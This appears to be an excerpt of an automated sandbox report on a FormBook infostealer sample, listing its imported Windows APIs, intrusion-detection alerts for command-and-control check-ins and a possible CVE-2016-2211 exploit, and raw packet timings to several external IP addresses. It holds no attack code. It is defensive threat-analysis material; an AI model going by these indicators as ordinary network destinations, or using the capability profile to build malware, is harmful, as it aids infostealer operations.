                                                                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-11-02T19:58:19.436606+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449730TCP
                                                                                                                    2024-11-02T19:58:58.160087+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449736TCP
                                                                                                                    2024-11-02T19:58:59.752236+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497373.33.130.19080TCP
                                                                                                                    2024-11-02T19:58:59.752236+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497373.33.130.19080TCP
                                                                                                                    2024-11-02T19:59:15.774748+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498133.33.130.19080TCP
                                                                                                                    2024-11-02T19:59:18.397222+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498293.33.130.19080TCP
                                                                                                                    2024-11-02T19:59:20.874788+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498423.33.130.19080TCP
                                                                                                                    2024-11-02T19:59:23.506988+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4498553.33.130.19080TCP
                                                                                                                    2024-11-02T19:59:23.506988+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4498553.33.130.19080TCP
                                                                                                                    2024-11-02T19:59:30.068307+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449886188.114.97.380TCP
                                                                                                                    2024-11-02T19:59:32.264938+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449902188.114.97.380TCP
                                                                                                                    2024-11-02T19:59:35.439788+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449915188.114.97.380TCP
                                                                                                                    2024-11-02T19:59:37.662317+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449924188.114.97.380TCP
                                                                                                                    2024-11-02T19:59:37.662317+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449924188.114.97.380TCP
                                                                                                                    2024-11-02T19:59:44.814744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44995731.31.196.1780TCP
                                                                                                                    2024-11-02T19:59:47.314833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44997331.31.196.1780TCP
                                                                                                                    2024-11-02T19:59:50.033490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44998831.31.196.1780TCP
                                                                                                                    2024-11-02T19:59:52.549123+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45000331.31.196.1780TCP
                                                                                                                    2024-11-02T19:59:52.549123+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45000331.31.196.1780TCP
                                                                                                                    2024-11-02T19:59:58.356579+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500153.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:00.977003+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500163.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:04.393140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500173.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:07.012343+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500183.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:07.012343+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500183.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:12.699785+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500193.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:15.334034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500203.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:17.817660+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500213.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:20.362830+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500223.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:20.362830+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500223.33.130.19080TCP
                                                                                                                    2024-11-02T20:00:26.343825+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023199.192.21.16980TCP
                                                                                                                    2024-11-02T20:00:29.057364+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024199.192.21.16980TCP
                                                                                                                    2024-11-02T20:00:31.618572+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025199.192.21.16980TCP
                                                                                                                    2024-11-02T20:00:34.178759+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450026199.192.21.16980TCP
                                                                                                                    2024-11-02T20:00:34.178759+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450026199.192.21.16980TCP
                                                                                                                    2024-11-02T20:00:40.094206+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002715.197.225.12880TCP
                                                                                                                    2024-11-02T20:00:42.393782+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002815.197.225.12880TCP
                                                                                                                    2024-11-02T20:00:44.959597+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002915.197.225.12880TCP
                                                                                                                    2024-11-02T20:00:47.554911+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003015.197.225.12880TCP
                                                                                                                    2024-11-02T20:00:47.554911+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003015.197.225.12880TCP
                                                                                                                    2024-11-02T20:00:53.315766+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031188.114.97.380TCP
                                                                                                                    2024-11-02T20:00:55.850869+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032188.114.97.380TCP
                                                                                                                    2024-11-02T20:00:58.402104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033188.114.97.380TCP
                                                                                                                    2024-11-02T20:01:01.010025+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450034188.114.97.380TCP
                                                                                                                    2024-11-02T20:01:01.010025+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450034188.114.97.380TCP
                                                                                                                    2024-11-02T20:01:06.958871+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003584.32.84.3280TCP
                                                                                                                    2024-11-02T20:01:09.490640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003684.32.84.3280TCP
                                                                                                                    2024-11-02T20:01:12.032393+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003784.32.84.3280TCP
                                                                                                                    2024-11-02T20:01:14.572456+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003884.32.84.3280TCP
                                                                                                                    2024-11-02T20:01:14.572456+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003884.32.84.3280TCP
                                                                                                                    2024-11-02T20:01:20.446412+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500393.33.130.19080TCP
                                                                                                                    2024-11-02T20:01:22.913097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500403.33.130.19080TCP
                                                                                                                    2024-11-02T20:01:25.457410+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500413.33.130.19080TCP
                                                                                                                    2024-11-02T20:01:28.268555+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500423.33.130.19080TCP
                                                                                                                    2024-11-02T20:01:28.268555+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500423.33.130.19080TCP
                                                                                                                    2024-11-02T20:01:35.101132+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004334.92.248.21680TCP
                                                                                                                    2024-11-02T20:01:37.645682+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004434.92.248.21680TCP
                                                                                                                    2024-11-02T20:01:40.287081+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004534.92.248.21680TCP
                                                                                                                    2024-11-02T20:01:42.919758+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45004634.92.248.21680TCP
                                                                                                                    2024-11-02T20:01:42.919758+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004634.92.248.21680TCP
                                                                                                                    2024-11-02T20:01:57.843634+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004745.56.219.23880TCP
                                                                                                                    2024-11-02T20:02:00.399991+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004845.56.219.23880TCP
                                                                                                                    2024-11-02T20:02:02.955966+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004945.56.219.23880TCP
                                                                                                                    2024-11-02T20:02:05.835121+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45005045.56.219.23880TCP
                                                                                                                    2024-11-02T20:02:05.835121+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005045.56.219.23880TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 2, 2024 19:58:59.054898024 CET4973780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:58:59.060389996 CET80497373.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:58:59.060842037 CET4973780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:58:59.068550110 CET4973780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:58:59.073379040 CET80497373.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:58:59.708456039 CET80497373.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:58:59.752235889 CET4973780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:58:59.917764902 CET80497373.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:58:59.917886972 CET4973780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:58:59.919178963 CET4973780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:58:59.926229954 CET80497373.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:15.131656885 CET4981380192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:15.136944056 CET80498133.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:15.137036085 CET4981380192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:15.147914886 CET4981380192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:15.152812004 CET80498133.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:15.774617910 CET80498133.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:15.774748087 CET4981380192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:16.658627033 CET4981380192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:16.663749933 CET80498133.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:17.677248001 CET4982980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:17.682213068 CET80498293.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:17.682307959 CET4982980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:17.692604065 CET4982980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:17.697952986 CET80498293.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:18.397167921 CET80498293.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:18.397222042 CET4982980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:19.205956936 CET4982980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:19.210962057 CET80498293.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.223886013 CET4984280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:20.228849888 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.228916883 CET4984280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:20.239447117 CET4984280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:20.244477034 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244488955 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244498968 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244508028 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244518042 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244527102 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244534969 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244544029 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.244607925 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.874605894 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:20.874788046 CET4984280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:21.752244949 CET4984280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:21.757380009 CET80498423.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:22.773374081 CET4985580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:22.780421972 CET80498553.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:22.780529976 CET4985580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:22.787769079 CET4985580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:22.792922974 CET80498553.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:23.485035896 CET80498553.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:23.506896019 CET80498553.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:23.506988049 CET4985580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:23.508143902 CET4985580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:23.513130903 CET80498553.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:28.549149036 CET4988680192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:28.554071903 CET8049886188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:28.554152012 CET4988680192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:28.562911987 CET4988680192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:28.567723036 CET8049886188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:30.068306923 CET4988680192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:30.073609114 CET8049886188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:30.073668003 CET4988680192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:31.083574057 CET4990280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:31.088749886 CET8049902188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:31.088834047 CET4990280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:31.098788023 CET4990280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:31.103653908 CET8049902188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:32.264792919 CET8049902188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:32.264806986 CET8049902188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:32.264815092 CET8049902188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:32.264938116 CET4990280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:32.266129971 CET8049902188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:32.266211987 CET4990280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:32.611839056 CET4990280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:33.630604982 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:33.922470093 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.922564030 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:33.933876038 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:33.939208031 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939222097 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939318895 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939328909 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939343929 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939352989 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939488888 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939524889 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:33.939580917 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:35.439788103 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.080369949 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.415327072 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.415411949 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.415469885 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.415481091 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.415497065 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.415515900 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.415539980 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.415540934 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.416161060 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.416171074 CET8049915188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.416213989 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.417351961 CET4991580192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.458415031 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.464390993 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:36.464509010 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.471643925 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:36.476933956 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.662173986 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.662204981 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.662216902 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.662230968 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.662240982 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.662317038 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:37.662556887 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:37.664479017 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:37.664572001 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:37.666960001 CET4992480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 19:59:37.671892881 CET8049924188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:43.805473089 CET4995780192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:43.813091993 CET804995731.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:43.813240051 CET4995780192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:43.822289944 CET4995780192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:43.827265024 CET804995731.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:44.764861107 CET804995731.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:44.814743996 CET4995780192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:44.915685892 CET804995731.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:44.915765047 CET4995780192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:45.330432892 CET4995780192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:46.349005938 CET4997380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:46.354042053 CET804997331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:46.354165077 CET4997380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:46.364168882 CET4997380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:46.369029045 CET804997331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:47.270052910 CET804997331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:47.314832926 CET4997380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:47.420986891 CET804997331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:47.421070099 CET4997380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:47.877365112 CET4997380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:49.008858919 CET4998880192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:49.013942003 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.017756939 CET4998880192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:49.039273024 CET4998880192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:49.044351101 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044362068 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044394970 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044404030 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044455051 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044464111 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044483900 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044492960 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.044503927 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:49.988681078 CET804998831.31.196.17192.168.2.4
